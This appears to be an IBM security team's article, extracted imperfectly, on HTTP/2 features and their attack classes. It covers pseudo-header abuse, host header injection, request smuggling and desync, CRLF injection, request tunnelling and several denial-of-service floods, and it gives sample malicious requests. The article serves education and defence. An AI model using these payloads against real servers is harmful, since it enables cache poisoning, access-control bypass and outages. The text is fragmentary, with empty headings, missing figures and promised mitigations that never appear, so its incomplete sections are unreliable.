HTTPS
HTTPS
HTTPS
com>
Hi Eduardo,
Authors
Pranali Phadtare, Soummya Kulkarni, Shruthi Shunmugom M
About Us
IBM PTC is a proficient internal Security Test Team responsible for
vulnerability assessment & ethical
hacking of web, mobile applications & infrastructure.
Abstract
So far, there are various versions of HTTP and their iterations include
HTTP/0.9, HTTP/1.0, HTTP/1.1, HTTP/2. The evolution in the versions
indicates the improvement in communications in the form of request and
response as we got to the latest version.
HTTP/2
Until this processing is complete at the server side, no new requests can
be sent. But this is an underutilization of the TCP connection as the TCP
connection is capable of handling multiple requests at a time. To load a
complete web page, we might need a lot of other supporting files apart
from the main.html page. For example, there could be JavaScript files,
CSS files, image files, etc.
So, for the web page to load completely over HTTP/1.1, each request must
be sent individually, and the response for each is retrieved one by one.
Obviously, the wait time impacts the speed the web page loads. To solve
this problem, modern browsers made use of six TCP connections at once if
the server is configured to use HTTP 1.1. So, the moment a user requests
a web page, as mentioned earlier, this web page needs many files along
with the main page. In this case, the browser opens six new TCP
connections and each request is sent over each of the six TCP
connections. This design is still slow, because if the number of files is more
than six, then there is a wait time again. Only if any of the six TCP
connections is closed can a new TCP connection be initiated for requesting
the seventh file. This design is also very expensive with more memory
being consumed.
This is the most important enhancement made in the HTTP/2 protocol. The
binary framing layer facilitates encapsulation and transfer of data between
the client and the server. The HTTP/1.x protocol was a newline delimiter
plaintext protocol, whereas in HTTP/2, the data to be transmitted is split
into messages and frames encoded in binary format.
The full request from the client is first broken down into multiple frames.
The frames can be a header frame, a data payload frame, etc., and each
frame is given a stream identifier in the header of each frame. After it is
broken down into frames, one or more frames can together form a
‘message’. A message is treated as a logical HTTP message, i.e., a
request and a response containing one or more frames. In this way, the
data is transformed and sent over the TCP connection and when the server
returns data to each of these messages in return, finally at the client side,
by using the stream identifier, data is properly arranged and presented to
the client and the end user.
2. Stream prioritization
HTTP messages are split across various frames and these frames are
transmitted as streams. These streams are multiplexed. Hence,
performance needs to be considered as there are multiple streams and
frames exchanged between client and server. To make this easier, HTTP/2
assigns weight and dependency to each stream. Streams are assigned an
integer weight and each stream may be given dependency on another
stream. Based on this weight and dependencies, a prioritization tree is
constructed by the client to decide how it would prefer to receive
responses. The server also uses this information to prioritize streams for
controlling CPU, memory, and allocation of other resources. This feature
improves browsing performance where there are many resources with
different dependencies and weights.
Source:
https://web-dev.imgix.net/image/C47gYyWYVMMhDmtYSLOWazuyePF2/
ydLldhPadjknvvrUiCai.svg
3. Flow control
The sender sends multiple requests to the receiver thus overwhelming it.
For example, a user wants to watch a video, hence the client has
requested the data on priority, now the user has paused the video so the
client wants to pause the delivery from server of unnecessary data and
buffering. The flow control mechanism prevents the sender from
overwhelming the receiver with data it does not want or is able to process.
HTTP/2 has multiplexed the stream into a single TCP connection. It allows
client and server to implement stream and connection level flow control.
Flow control has a direction and a window size chosen by the receiver for
each stream and connection. "SETTINGS" frames are exchanged between
client and server when the HTTP/2 connection is established. This frame
allows you to set the size of the flow control window in both directions. No
specific algorithm is provided by HTTP/2 to implement flow control. An
example for this feature can be something like this - a user has fetched an
image via browser. Application layer flow control allows you to fetch a
preview of an image, display it, and reduce the size for that window to zero.
It allows high priority fetches to proceed and resume the fetching when
high priority fetches are complete.
4. Header compression
If the header name: value pair is present in static dictionary, then it will
simply refer to that encoded value, which will hardly take 1- or 2-byte size.
If new header is encountered, it will add it to the dynamic dictionary or, if
previously encountered, it will simply refer to the dynamic dictionary and
only encode the header value, which will again take only 1 or 2 bytes, thus
compressing headers as much as possible.
Server push
It is well known that, for a complete web application to load, there are
multiple files required. For an instance, the main.html in a web application
would require several supporting files along with it to be served. Instead of
the client requesting each page, Server push enabled the capability of the
server to return all the required files for the web page to load completely to
the client in response to a single client request. Here, the client doesn’t
have to request each page individually.
Source: https://twitter.com/apnic/status/1255699646866997255
But with the introduction of HTTP/2, pseudo headers replaced the request
lines and status lines. Pseudo-headers are used to indicate information
about the request message. There are five pseudo-headers in HTTP/2
namely, :method, :path, :authority, :scheme and :status. These are not
regular HTTP headers, but only a replacement of the status line in
HTTP/1.x. The below figure shows the header representation of a sample
HTTP/2 application.
Each of these pseudo headers serve different purposes. One among them
is the :scheme header. The :scheme header is used to represent the
scheme of the target URI. It can take values like HTTP, HTTPS, etc. But it
can also take random values. For example, a :scheme header can take the
value of a URL. If proper validation is not in place, this could even lead to
redirection and cache poisoning.
Request headers:
:method GET
:path /index.html
:authority9.199.145.174:8443
Response:
Few web applications use the scheme to build the URL to which the
request is routed, creating a probable SSRF vulnerability.
:method POST
:path /index.html
:authority test.com
:scheme https
user-agent burp
x=123&y=4
There are some servers that do not allow new lines in header names but
do allow colons. Hence, this can be used to carry out desynchronization in
HTTP/2. This can be used to provide the server with multiple hosts. A host
header in an HTTP/2 request is written as :authority <host name>, so we
can add one more host header in the following way host:attacker.com 443.
This is treated as new header by HTTP/2, which can result in host header
injection.
:method GET
:path /
:authority example.com
host: test.com443
GET / HTTP/1.1
Host: example.com
Host: test.com:443
:method GET
:path /some-path
:path /different-path
:authoritytest.com
If the front end permits spaces in the :method, request line injection is
enabled.
<ProxyMatch “/admin”>
:path /fakepath
:authoritytest.com
Host: sample.com
Request-Id: 1234
Poison: x
User-agent: burp
………..
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 2500
Reset Flooding
Settings Flood:
The SETTINGS frame does not need to maintain any state other than the
current value of each setting. Therefore, the value of a SETTINGS
parameter is the last value that is seen by a receiver.
When the client wants to request a page to the server, it sends the request
1 by opening a new stream – Stream 1 and assigns a stream identifier to it.
The client sends the request over stream 1 and the server responds on the
same Stream 1. Now if the client wants to send another request 2 to the
server, ideally it has to open a new stream – Stream 2 for request 2. In
Stream reuse attack, sending the request 2 over the used Stream 1 could
lead to Denial of Service on the server. Research done on IIS vulnerable
version 10 has shown that utilizing the same stream in the same
connection has led to the Blue Screen of Death.
As described earlier, the HTTP/2 protocol splits the HTTP messages into
multiple frames and these frames are transmitted over streams. As a
result, multiple frames are exchanged between the client and the server.
During this flow, the streams are assigned with integer weight and a
dependency. In this way, a dependency graph is constructed. According to
the RFC standard, the dependency graph should be a true and never be a
cycle, as a cycle-based dependency graph can lead to an infinite loop and
finally crash the server. Apart from this, the size of the graph is also not
limited. This means that, a server can set its own size limitation. If the
dependency tree size limitation is not implemented, a malicious client can
create a huge sized graph which can consume the server’s entire memory.
Few servers have seemed to show Denial of Service because of the lack of
these implementations in place. A configuration to implement size limitation
to the dependency graph is to set the MAX_CONCURRENT_STREAMS.
When the MAX_CONCURRENT_STREAMS is achieved, the server cleans
up the old memory address and assigns it to the new stream.
DoS on httpd
There are 15 streams in a connection and the streams are assigned with a
particular memory address like below.
HPACK Bomb is kind of DoS attack that takes advantage of the HPACK
algorithm being used in HTTP/2. In this attack, the attacker supplies a
header field that is very large in size. It is exactly the same size as that of a
dynamic table. It inserts that header field in the dynamic table, which has
same size of that header field. The attacker now sends a header block,
which are repeated requests to expand that field in dynamic table. This
leads to compression of a large amount of data to a smaller size.
HTTP/2 protocol also shows itself vulnerable to empty frames flood. Empty
frames flooding is an attack in which a malicious client tries to send n
number of empty frames, i.e., frames with empty payload and without
setting the end-of-stream flag. The frames that can be used to flood are
DATA, HEADERS, etc. The server tried to process these empty frames
without being able to achieve the end of the stream thus consuming excess
CPU. This eventually results in Denial of Service.
Slow Read
Data Dribble
Resource Loop
HTTP/2 Downgrading:
Request Smuggling:
The HTTP/2 protocol uses its own built in length mechanism to identify the
end of an HTTP request. So, a dedicated header that indicates the content
length is not required for an HTTP/2 connection. But when there is a
downgrade happening, the front-end servers will add an additional
Content-Length header to the HTTP request and then forward to the back-
end server. A malicious user can inject or manipulate the Content-Length
header and therefore the back-end server can treat the incoming request
as two different requests. An example representation of a H2.CL Desync is
shown below.
Such downgrading can lead to many more Desync attacks like H2.TE
request line injection, H2.TE Header injection, H2.X via request splitting
and so on.
Response queue poisoning:
CRLF:
When a browser sends a request to a web server, the web server answers
back with a response containing both the HTTP response headers and the
actual website content, i.e., the response body. The HTTP headers and the
HTML response (the website content) are separated by a specific
combination of special characters, namely a carriage return and a line
feed. For short, they are also known as CRLF.
Since the header of an HTTP request and its body are separated by CRLF
characters, an attacker can try to inject a combination of CRLFCRLF which
tells the server that the header ends and the body begins as shown below:
Content-Type: text/html
Location: \r\n
<html><h1>hacked!</h1></html>
Content-Type: text/plain
Request Tunnelling
We can’t poison the socket to interfere in other user’s request we can still
send a single request that will give two responses from back end. This will
enable us to hide the request and its response from the front end. This
technique to bypass front end security measures is called request
tunnelling.
In HTTP/2, each stream should contain a single request and response. If
we receive an HTTP/2 response and the response body appears to be
HTTP/1 response, then we can conclude that the second request is
successfully tunnelled.
:method POST
:path /comment
:authority vulnerable-website.com
content-typeapplication/x-www-form-urlencoded
foo bar\r\n
Content-Length: 200\r\n
\r\n
comment=
Let us consider this sample request, initially both front and back end will
agree that this is a single request, but they can be made to disagree on
where the headers end.
Front end – Considers everything as part of header and will append the
new headers after comment= string.
Back end – Sees /r/n/r/n sequence and considers this as the end of
headers and will treat comment= string along with internal headers as part
of the body and will consider the new headers as part of the value of the
comment parameter.
Blind request tunnelling is hard to identify but can be made non-blind using
the HEAD method.
Request
:method HEAD
:path /example
:authorityvulnerable-website.com
Response
:status 200
content-type text/html
content-length 131
Conclusion
Any new technology will have its surface open to the cyber world. Even
though HTTP/2 improved the performance of the website, the protocol
implementation flaws and misconfigurations have exposed the website
using HTTP/2 to greater security risks. Applications that were secure
earlier have now become insecure in a few aspects. A whole new set of
vulnerabilities also arise when the HTTP/2 protocol is not implemented
end-to-end and with downgrading. Throughout this article, we tried to
showcase a few of the security vulnerabilities associated with HTTP/2
protocol. It is very much essential for any organization to ensure that they
are aware of these security loopholes and take prompt action in preventing
bigger cyber-attacks. Below are a few of the mitigation techniques we
would recommend for the ones who would like to secure their websites on
HTTP/2.
Powered by Intercom